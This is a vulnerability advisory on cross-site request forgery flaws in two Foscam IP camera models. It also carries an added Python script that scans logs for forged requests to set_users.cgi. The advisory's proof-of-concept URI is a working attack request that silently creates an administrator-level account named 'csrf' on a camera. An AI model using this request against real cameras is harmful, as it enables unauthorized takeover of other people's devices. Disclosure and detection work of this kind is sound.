Multiple Foscam IP Cameras Multiple Cross Site Request Forgery Vulnerabilities
BID:58943
Info
| Bugtraq ID: | 58943 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 09 2013 12:00AM |
| Updated: | Apr 09 2013 12:00AM |
| Credit: | shekyan |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Multiple Foscam IP Cameras are prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
The following products are vulnerable:
- Foscam FI8910W running Embedded Web Interface 2.4.10.3
- Foscam FI8908W running Embedded Web Interface 2.4.10.3
Exploit / POC
To exploit these issues, an attacker must entice an unsuspecting victim to visit a malicious webpage.
The following example URI is available:
http://www.example.com/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=
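A detection sketch for the request shape shown above, added here as an example and not part of the original advisory: it scans gateway or proxy log lines for GET requests to set_users.cgi, compares the Referer host with the camera host, and lists which user slots the request fills (passwords are not extracted). The log layout, hostnames, addresses and function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed layout: <camera-host> <client> [time] "GET <uri> HTTP/1.x" <status> "<referer>"
LINE_RE = re.compile(
    r'^(?P<host>\S+) (?P<client>\S+) \[[^\]]*\] '
    r'"GET (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3}) "(?P<referer>[^"]*)"'
)

def changed_accounts(query):
    """Return (slot, user, privilege) for each non-empty userN; pwdN is never returned."""
    params = parse_qs(query, keep_blank_values=True)
    found = []
    for n in range(1, 9):  # the advisory's example URI carries user1..user8
        user = params.get(f"user{n}", [""])[0]
        if user:
            found.append((n, user, params.get(f"pri{n}", [""])[0]))
    return found

def classify(line):
    """Return None for unrelated lines, else a finding for a set_users.cgi request."""
    m = LINE_RE.match(line)
    if not m:
        return None
    uri = urlsplit(m["uri"])
    if not uri.path.endswith("/set_users.cgi"):
        return None
    referer = m["referer"]
    ref_host = urlsplit(referer).netloc if referer not in ("", "-") else ""
    if not ref_host:
        verdict = "no-referer"      # inconclusive: typed URL or suppressed referrer
    elif ref_host.lower() == m["host"].lower():
        verdict = "same-origin"     # consistent with the camera's own admin page
    else:
        verdict = "cross-origin"    # request was triggered from another site
    return {"client": m["client"], "camera": m["host"], "verdict": verdict,
            "referer_host": ref_host, "accounts": changed_accounts(uri.query)}

# Constructed sample log lines (not real traffic).
SAMPLE = [
    'cam.example.test 192.0.2.10 [09/Apr/2013:10:00:00 +0000] "GET /set_users.cgi?user1=admin&pwd1=x&pri1=2&next_url= HTTP/1.1" 200 "http://cam.example.test/user.htm"',
    'cam.example.test 192.0.2.10 [09/Apr/2013:10:05:00 +0000] "GET /set_users.cgi?user1=&pwd1=&pri1=2&user8=csrf&pwd8=csrf&pri8=2&next_url= HTTP/1.1" 200 "http://forum.example.net/thread/42"',
    'cam.example.test 192.0.2.10 [09/Apr/2013:10:06:00 +0000] "GET /index.htm HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry))
```

A missing Referer is reported as its own verdict because it neither confirms nor rules out a forged request.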
Solution / Fix
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- Foscam Product Page (Foscam Digital Technologies)
- IP Camera CGI V1.27 (Foscam Digital Technologies)